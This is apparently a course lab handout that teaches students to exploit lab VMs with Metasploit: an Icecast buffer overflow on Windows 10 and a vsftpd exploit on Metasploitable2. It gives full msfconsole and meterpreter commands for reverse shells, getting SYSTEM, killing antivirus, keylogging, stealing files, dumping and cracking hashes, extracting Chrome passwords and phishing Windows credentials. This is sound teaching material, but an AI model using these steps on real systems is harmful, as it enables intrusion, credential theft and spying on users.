Lab – Exploitation

See here for instructions on setting up virtualbox for this class.

Heads up! Be sure that you have created the infosec-net virtualbox network, as specified at the top of the above link, before importing the vm! It's not the end of the world if you don't, but it does require some extra work.

This lab uses the following vms:

In this lab you will use Metasploit and the Nessus vulnerability report from the previous lab to exploit and take control of a Windows 10 VM and the Metasploitable VM you scanned in the previous lab.

Metasploit

Metasploit is the industry’s most popular exploitation tool. According to Sectools.org:

Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality.

Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less).

Metasploit Interfaces

The Metasploit framework has a variety of different interfaces, including the command line tool mcli and meterpreter, an interface designed to interact with compromised computers. You can even work from an interactive Ruby programming language interpreter within Metasploit (Metasploit is written in Ruby). However, the most popular interface, and the one we will use chiefly in this lab, is msfconsole. Msfconsole is an interactive environment that allows you to scan hosts, test and launch exploits, and build and deploy payloads.

Terminology

Below is a list of common terminology relating to Metasploit, taken (with some adaptation) from Metasploit: The Penetration Tester’s Guide, by Kennedy et al.

Exploit
The means by which an attacker takes advantage of a flaw within a system, an application or service. An exploit results in a particular outcome unintended by the original developer. Common exploits include buffer overflows, web application vulnerabilities (like SQL injection), and configuration errors.
Payload
Code that the attacker wants the system to execute and that is selected and delivered by Metasploit. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a command prompt, whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.
Module
A module in the context of Metasploit is a piece of software that can be used by Metasploit. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes Metasploit so powerful.
Listener
A component within Metasploit that waits for an incoming connection of some kind. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited system.

Common Commands within Msfconsole

help Lists available commands.
show exploits Shows all available exploits in the Metasploit framework. New exploits are constantly being developed and incorporated into the framework.
show auxiliary Shows auxiliary modules within Metasploit framework.
search Searches exploit and auxiliary modules for one or more terms. For those familiar with grep, the search function works the same way.
use [module] Loads a Metasploit module. The back command exits the module.
back Exits the current module.
show options Within a particular module, show options displays the required and optional configurations that the module uses.
show payloads Within a module, show payloads displays all the payloads that are available to use with the module.
show targets Within a module, list targets shows OS versions that are vulnerable to the module.
info Within a module, info shows additional information about the module.
set/unset Sets an environment variable used as an option specific to a particular module.
setg/unsetg Sets a global environment variable used as an option that applies across modules.
save Saves the current global options so they are available the next time you run msfconsole.

Get the Windows 10 VM ready

Use the Windows 10 vm for this.

  1. Open Windows Defender and turn off real-time protection. To do this:

    • Double-click the disable-defender.ps1 script which is on the Desktop.
    • Or, manually,
      • click the windows button on the bottom left of the desktop and searching for ‘Defender’ and choose ‘Windows Defender Security Center’
      • click ‘Virus & Threat protection settings’
      • move the ‘Real-time protection’ slider to the left.
  2. Turn off Windows Firewall. Open CMD with administrative privileges by typing in “cmd” in the Windows search field. Right-click the “Command Prompt” icon, and select “Run as administrator.” Once the command prompt opens, enter the following command:

    netsh advfirewall set allprofiles state off
    

Configure Kali Linux VM

  1. Boot your Kali VM, and login as user root and password toor.
  2. open a terminal and try to ping the IP address of the Windows 10 VM.
  3. Finally, from the Windows 10 VM, ensure that you can ping the Kali VM.

If you are successful in pinging the VMs in both directions, then you are ready to continue the lab. If not, make sure that each VM is connected to the infosec-net network by checking ifconfig on Kali and ipconfig on Windows 10. Also make sure that the firewall is down on Windows 10.

Is your computer dragging when you have both VMs open? Try toning down resources allocated to Kali and Windows 10. Shut down both VMs, and open the VirtualBox manager. For each vm, click "settings", and drop memory down to around 2048 MB. If that doesn't help things, also try dropping number of CPUs.

Start Icecast on Windows 10

Icecast is a media streaming sever that was vulnerable to a buffer overflow attack in versions 2.01 and earlier see the exploit information here. Old versions of Icecast can be found here. For this section of the lab, you will run a vulnerable version of the Icecast server.

  1. On Windows 10 desktop, right-click the “Icecast2 Win32” icon. Important! Select “Run as administrator,” and click “yes” on the warning message the pops up.
  2. In the Icecast window, click the button “Start server.”

Metasploit Exploit Walkthrough using the Icecast Vulnerability

  1. Boot your Kali VM, and login.
  2. Install two additional packages that you need for this lab by running the following commands in a terminal, one line at a time:

    apt update
    apt install mirage xtightvncviewer
    reboot
    

    Say “yes” to any prompts during the install process.

    If you do not have an internet connection in Kali, try running service networking restart. Failing that, restart Kali via running reboot.
  3. From the terminal, enter:

    service postgresql start
    
  4. From the terminal, enter:

    msfconsole
    

    You should see a “msf >” prompt appear. This is the Metasploit command line.

  5. Scan the Windows 10 VM for vulnerabilities using nmap

    nmap -sV <ip of Windows 10>
    

    Notice that Icecast is running on port 8000. Could their be an exploit for Icecast built into Metasploit? Let’s check!

  6. From the msf > prompt, try:

    search name:icecast
    

    If the output tells you that you are using "slow search", then cancel with ctrl+c, and run the following from the msf > prompt:

    db_rebuild_cache
    

    This will allow you to search for Metasploit exploit and auxiliary modules. It will run in the background. It may take some time before the search cache is ready. You can still use "slow search" meanwhile.

  7. Heyo! In the search output, you should see an exploit related to icecast called exploit/windows/http/icecast_header. Use it:

    use exploit/windows/http/icecast_header
    
    Note: you can press the tab key within Metasploit to complete a module or command name you are typing. This makes entering commands in Metasploit faster. If you push the tab key twice it will show you all possible options directory you are in.
  8. Your msfconsole prompt should now look like this:

    msf exploit(icecast_header) >
    

    Indicating that the icecast_header module is loaded.

  9. To get more information about this exploit module, type info. This module has been rated “great,” meaning it is very effective and reliable. Besides providing a better description, the info command shows the targets that the module is effective against, as well as options to set.

  10. To show available options, type show options.

  11. Let’s set the required options. First, we’ll set the remote host:

    set rhost <IP address of your Windows 10 VM>
    

    Type show options again to see that the RHOST variable has been set.

  12. Next, let’s look at available payloads for this exploit:

    show payloads
    
  13. We have a lot of payload options for this module. We’ll use one of the most popular and reliable payloads. Type:

    set payload windows/meterpreter/reverse_tcp
    

    Meterpreter is a shell, like Bash, except evil. This payload will open a reverse TCP connection from the exploited Windows 10 VM back to the Kali VM. This is why it is important that you are able to reach Kali from Windows 10, and Windows 10 from Kali.

  14. Type show options again to see the options that are required for this payload.

  15. To set the local host variable, type

    set lhost <IP address of the Kali machine>
    
    Note: Remember that you can easily check your IP in Unix/Linux by typing ifconfig from within Metasploit. Type `show options` to see that the variable has been set.
  16. With all options set, now it’s time to launch the exploit!. Type:

    exploit
    

    (Or equivalently, run, but that’s less fun.)

  17. You should now be presented with the “meterpreter >” prompt. If you see this, then congratulations! You’ve exploited your first remote host.

  18. Laugh maniacally.

    Introspective question: How did it feel to laugh maniacally? Do you comprehend the potency of your newfound power? Did anyone overhear you laughing maniacally?
    Never forget that you are a script kiddie.
  19. Now that we have access, let’s run a few commands to give you an idea of the power of the meterpreter interface.

  20. To see all possible Meterpreter commands, type help.

  21. Type sysinfo to see information about the compromised system.

  22. Type getuid to see the system user you now control.

  23. Because Icecast was “run as administrator”, we can easily become SYSTEM – the Windows equivalent of “root”. Escalate your privileges by typing getsystem. Type getuid again. You should see that you have “NT AUTHORITY\SYSTEM,” which means you administrator privileges.

  24. Now that you are SYSTEM, laugh again.

  25. With a Meterpreter shell, you have access to a trove of post-exploit modules included in the Metasploit framework that you can run on the victim machine. For instance, type

    run post/windows/manage/killav 
    

    to stop anti-virus processes that might limit our attacks on the machine.

  26. You can execute commands on the victims host from within Meterpreter. For example, type:

    execute -f cmd.exe -c 
    

    This will launch cmd.exe on the victim’s machine. You can hide the command window from being shown on the victim machine by using the -H option.

    The -c option “channelizes” the cmd.exe, which means that meterpreter can continue interacting with it. Notice the message that “Channel 1 was created.”

    Interact with cmd.exe by typing: channel -i 1. Use the dir, cd, and cd .. commands to browse around the file system. Type exit to return to meterpreter.

    Since opening a command prompt is such a common action, you can simply type shell to open a hidden command prompt.
  27. Type screenshot to capture a screenshot of the current GUI. A jpeg file should be saved to /root on your Kali machine. You can view the image from a different shell in Kali by navigating to the directory of the stored image and viewing it with mirage [image name].

  28. Control the Windows GUI.

    From meterpreter, type background or cntl+z. This sends the current meterpreter session to the background so you can do more things in the Metasploit console.

    For this, we will use a different payload – the vncinject payload.

    set payload windows/vncinject/reverse_tcp
    

    Type show options. Change the “ViewOnly” option to false

    set ViewOnly false
    

    Run exploit anew.

    A new window will open on Kali Linux that will let you control the Windows VM using the mouse. You are now controlling the Windows user interface! Whatever you do, the logged-in user will see! Trying moving a window on the Windows VM. Then, close the VNC window on the Kali VM. Because you closed the VNC window, the exploit terminated.

  29. Let’s recover your meterpreter shell. Run sessions -l to view all running connections. You should see your meterpreter session, along with its id.

    Interact with that session again by running sessions <the id of the session>. Your prompt should change, and you should be engaged with the meterpreter session again.

  30. Start a keylogger on the victim’s computer. Type keyscan_start. Now, from the Windows 10 machine, open Notepad.exe and type some secrets. They are no longer secrets. Back in meterpreter, type keyscan_dump. You should see the text you typed in Notepad. To stop the keylogger, type keyscan_stop.

  31. Steal a file – download a file from Windows 10 to Kali.

    Use Notepad to create a text document on the Desktop of the Windows 10 machine. Put more secrets in it.

    From the meterpreter session, use the cd command within Meterpreter to navigate to the victim desktop. For that, you can either use the Windows path specification, with double back-slashes:

    cd c:\\users\\labuser\\desktop
    

    … or you can use linux path specification:

    cd /Users/labuser/desktop
    

    Now type ls to see what you might pilfer.

    Snag the secrets file.

    download [filename to steal]
    

    The file should now be pilfered, saved to the Kali VM at /root.

  32. Dog gonnit gotta keep those secrets secret! Name your secrets file something memorable, and hide it somewhere in the Windows filesystem.

    The victim’s tricks are no match for meterpreter. Use the search command from within meterpreter to find the secrets file again:

    search -f [name of your secrets file].txt
    

    Got’em.

  33. Annoy the user. First, disable their keyboard and mouse:

    uictl disable all
    

    Then, play a video for them. We’ll use the play_youtube post module. Read about it from within meterpreter:

    info post/multi/manage/play_youtube
    

    From your laptop or whatever, select your favorite annoying youtube video. Note the url of the video – it will include a v=[video id] in it. Copy the video id. For example, one video id is DLzxrzFCyOs. Let’s play this video, setting VID to your video. e.g.:

    run post/multi/manage/play_youtube VID=DLzxrzFCyOs
    

    Switch over to the Windows VM and enjoy the video. Press ctrl-w to close it – oh wait you can’t, you disabled keyboard and UI access. Mwahaha. Enjoy the video some more.

    From meterpreter, reenable ui controls:

    uictl enable all
    
    Not for credit but just for fun: Share on slack which annoying video you chose. (remind me to create a slack channel for this if I have not by the time you do this lab.
  34. Because you getsystem‘ed earlier, you can obtain the password hashes for the machine by typing hashdump. These hashes can be readily cracked using a password cracker like Hashcat or John the Ripper (covered in the password cracking lab). For now, we’ll use Google to crack the password hash for user labuser.

    Note: hashdump command outputs hashes in the following format:

    username:SID:LANMAN hash:<NTLM hash>:::
    

    For example, in the following hashdump, the NTLM hash is C1F1B7BDB01896908C80A0A67062BF24:

    Frank:1000:3A956F63F23DAC7236077A718CCDF409:C1F1B7BDB01896908C80A0A67062BF24:::
    

    Copy the NTLM hash that you obtain from hashdump for the labuser user. Open a web browser, and visit a site like https://crackstation.net, and let it crank on your hash. This site uses a rainbow table.

    Alternatively, try to crack it on your own using hashcat with -m 1000 (NTLM) and a wordlist like rockyou. Go on, it’s fun!

    Question: What is the NTLM hash of the WDAGUtilityAccount?

    (The WDAGUtilityAccount is the account that Windows Defender runs as. Uncrackable, as far as I know.)

  35. Right now, your meterpreter sessions is tied to the Icecast process. This means that if Icecast is closed, you lose your shell. Let’s migitate that threat by migrating to another, more permanent Windows process that is at less risk of being closed down.

    Type ps -S Icecast (note the capital ‘S’ argument and the captial ‘I’ in Icecast) to search for processes with the name of “Icecast.” Note the process ID. Next, type getpid to get the process that meterpreter is running off of. It should be the same process ID as Icecast. This confirms that you are tied to Icecast.

    Now, run this post module, which by default will spawn a hidden notepad.exe process, and migrate you to it:

    run post/windows/manage/migrate
    

    Now, close the Icecast window. Your meterpreter session should still be running. Persisted.

  36. You may have noticed that web browsers such as Chrome offer to save passwords for you that you enter into websites. Surely those passwords are secure, right? Let’s see!

    1. In the Windows VM, open Chrome and go as if to log in to a website (such as my.cu.edu). For this exercise, do not use your real credentials. Rather, as the username, enter your First and Last name, and for the password, enter anything excepting your real password. Without actually signing in, click the key symbol to the right of the URL bar, and select “Save.” Chrome has now stashed the password in its “secure” (lol) database. Verify this in Chrome by clicking the three vertical dots in the upper right > settings > Passwords. See that your password for the site is obfuscated. Click the eye to attempt to view it. It is password-protected! Don’t bother revealing it. Is it secret? Is it safe? Do you feel comfortable right now?

    2. Relaunch the Icecast server, But this time, not as “administrator”. Be sure to press the “start” button again.

    3. Background (or exit) your meterpreter session. This will return you to the msfconsole prompt.

      Then, from the msfconsole, re-select (use) the Icecast exploit, and run (i.e., `exploit) it again.

      You should now have a new shell tied to the new Icecast process, which is tied to the non-admin-ed Icecast process. To confirm, type getsystem – it should error out. You’re just a regular labuser.

    4. From within your shiny new inferior non-admin-tied meterpreter session, run the chrome password-snagging post module:

      run post/windows/gather/enum_chrome
      

      In the output of that command, you should see a line saying Decrypted data saved in: [directory on your kali machine]. Copy that filepath. Open another Kali terminal, and cat that file. You should see the Chrome login that you saved.

      Don't see a "decrypted" line? Double-check to make sure that you actually saved the login to Chrome.
      Chrome postmod crashing and unable to pull the decrypted file? You need to run this module from a meterpreter session that is tied to a non-admin'ed process (such as a session tied to a Icecast server not started as "admin").

      When do I use the use... set... run pattern versus just run on its own?

      This is an important principle to understand in order to maximize pwnage.

      Postmodules can be run from two possible places:

      1. meterpreter shells (i.e., meterpreter sessions)
      2. msfconsole

      The msfconsole is the master, and the meterpreter shells (or whatever shells) are its slaves.

      From Meterpreter

      If you want to run a postmodule from a meterpreter session, you use the run syntax, with any necessary options specified inline:

      run <postmodule path> option1=value1 option2=value2
      

      … like you did with the play_youtube exploit.

      With this method, you do not need to set the SESSSION option because the session is implicit when you are running the module from within a meterpreter session – it will always just use that current interacted-with session.

      From msfconsole

      Alternatively, and sometimes more easily, you can run postmodules from msfconsole, over an already-established session. Doing so requires obtaining a session and then backgrounding it to return to msfconsole.

      The syntax for this method is more verbose, and is a series of commands instead of a single action-packed one. The pattern is:

      use <postmodule> # this arms it
      set session <sessionid> # this is required when running postmods from msfconsole
      set <whatever else, such as we set the VID for the youtube exploit>
      run
      

      This is important to note – when you invoke run from msfconsole, it is equivalent to invoking exploit. You may not add any additional arguments after saying run. If you do say anything extra, it is ignored, and the currently-armed exploit (shown in red in the prompt) will be run.

      With the second method, msfconsole will run the postmod exploit over your already-established session (assuming that you actually already have one that is still valid)

      Summary

      So, again, there are two ways to run postmodules.

      1. From within meterpreter (condensed syntax where everything is specified on one line, starting with run)
      2. From msfconsole (expanded syntax where multiple commands must be invoked to run one postmodule – e.g., use, set, run/exploit

      The shell_to_meterpreter postmodule for linux boxes, which you will encounter later in this lab, must be run from msfconsole because you cannot run postmodules from a podunk unix shell.

      But really, the podunk unix shell isn’t all that bad. You still have access to upload and download extra functions which are easier than scp.

    Question: Take a screenshot of you running the cat command on the Chrome password loot, including the output of the cat command, showing your login information.

    Example screenshot to submit:

    img

  37. Prompt the Windows user for their password. From meterpreter, type:

    run post/windows/gather/phish_windows_credentials
    

    On Windows, you should see a legitimate Windows prompt, triggered by powershell code run by meterpreter on the victim machine, asking for the user to enter their password. This prompt will not go away until the user enters their correct password (which, for labuser, is Password1). Enter the password.

    On Kali, in meterpreter, you should see the username and password.

  38. When you’re finished, type exit to close the Meterpreter session. Or, type background (or ctrl+z) if you want to return to it again later.

Part 2: Metasploitable2 Discovery

Take Note! This section attacks Metasploitable2, not the Windows machine! As such, it can be done completely independently of Part 1. You do not need to have exploited Windows in order to do these steps.

Start the Metasploitable2 VM.

  1. Do a wide sweep to check which ports are open on the Metasploitable2 VM:

    nmap -sS 192.168.55.102
    

    And check versions for common ports:

    nmap -sV 192.168.55.102
    

    Versions for all ports:

    nmap -sV -p1-65535 192.168.55.102
    

    Versions for one specific port:

    nmap -sV -p80 192.168.55.102
    
  2. Note that the service “vsftpd” is running on part 21. In Kali, from a msfconsole prompt, search for a vsftpd exploit:

    search vsftpd
    

    Select (use) the exploit, and set any necessary options (show options). Check available payloads:

    show payloads
    

    You will see that a meterpreter shell is not available for this exploit – at least, not initially. Instead you will get a very basic unix shell.

    Run the exploit. You will see a final line saying something along the lines of “Command shell session opened…” followed by… nothing. Did the exploit fail? No! You have a shell, albeit a very basic one.

    Type id to see who you are. Type other familiar commands, such as ls, pwd, and cat [filename]. You do not have tab-completion, sadly. Although you do have a few basic commands. Run:

    help
    

    Notice that you have download and upload commands. This can be useful to steal files without having to use scp. However, you cannot run metasploit postmodules from within this sessions. Let’s fix that by upgrading to a meterpreter session.

    1. Background your session. This will return you to the msfconsole prompt.
    2. Select (use) the following postmodule:

      use post/multi/manage/shell_to_meterpreter
      

      This command will use our first shell to upload and initiate a meterpreter shell session.

      Once you have this postmodule selected, type show options. Set the needed options, including the session number for the background session. Launch (run) the post-module. A new meterpreter session should be created. Find the session id of this new sessions (run sessions), and interact with it (sessions [sessionid]).

      Type help again. You now have more meta-commands available than before, including accses to postmodules from the shell.

    3. Let’s hashdump metasploitable2. This will give you a list of usernames and password hashes. You can later crack these hashes on Kali.

      From your meterpreter session,

      run post/linux/gather/hashdump
      

      This will print all usernames and hashes to the console. It will also save the information to a file in the /root/.msf4/loot/ folder. Make sure you know how to find this file – you can use it to crack hashes in hashcat or john the ripper. View the contents of the file in a separate kali terminal by cating it.

      Question: What is the salt and hash for the Postgres user? For example, the salt and hash for the msfadmin user is msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/

      You technically do not have to upgrade to a meterpreter session to run the postmodules. You can alternatively run the postmodules using the basic shell session from the msfconsole. to do so, you would select the postmodule as you would an exploit:

      use post/linux/gather/hashdump
              
      show options
              
      set session [sessionid of basic unix shell]
      

      This will execute the postmodule over the basic shell session.

Exploitation Exploration

Recall that the general strategy for exploitation requires:

  1. Service enumeration and version recon
  2. Exploit identification

If you run nmap against metasploitable2, you will get a long list of running services. If you include the -sV flag, you will get some version information. However, the nmap version probes can only gain so much insight. Some services require you to use other methods to do version recon, such as connecting to the service using an app that can speak the service protocol (i.e., hexchat to connect to the IRC chat client).

You can use what you know about the running service, including its name, to search for exploits. Metasploit’s built-in search functionality is a bit cumbersome and obtuse, and many prefer to install exploitdb to get access to the searchsploit command, which has more intuitive search functionality and nicer reporting and which includes non-metasploit exploits as well (any available on exploit-db.com). But you should be able to get by with the basic metasploit search functionality with some trial-and-error and deductive reasoning.

For instance, if nmap -sV reported that a service called Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb) was running on port 8787, and you wanted to search for an exploit for it, you might use the following search in msfconsole:

search ruby drb rmi

This would return a lot of results! Enter search to see how we might refine our query. The help docs report that we can filter by type: and also by name: (where the default is to just search by keyword, where the term can appear anywhere in the exploit file).

So, filter down to just exploits:

search ruby drb rmi type:exploit

That’s still a lot of results! A lot of the exploits are written in ruby, so let’s narrow that term to only search the name::

search name:ruby drb rmi type:exploit

Just two results now. We can work with that. If you googled for what ruby DRb represents, you would see that the DRb stands for “distributed”. This would help you pick which of the two exploits to try first.

And of course, you can always google version names along with the term “exploit” to see what comes up.

Now, exploit three additional services.

Exploit the following additional service

Exploit two more additional services from the following list

Part 2 Deliverable

For each of the three additional exploits, take one screenshot showing:

Example – Screenshot 1 out of 3:

img

...and two more screenshots!

Question: Take a screenshot for each of the three above successful exploits you performed.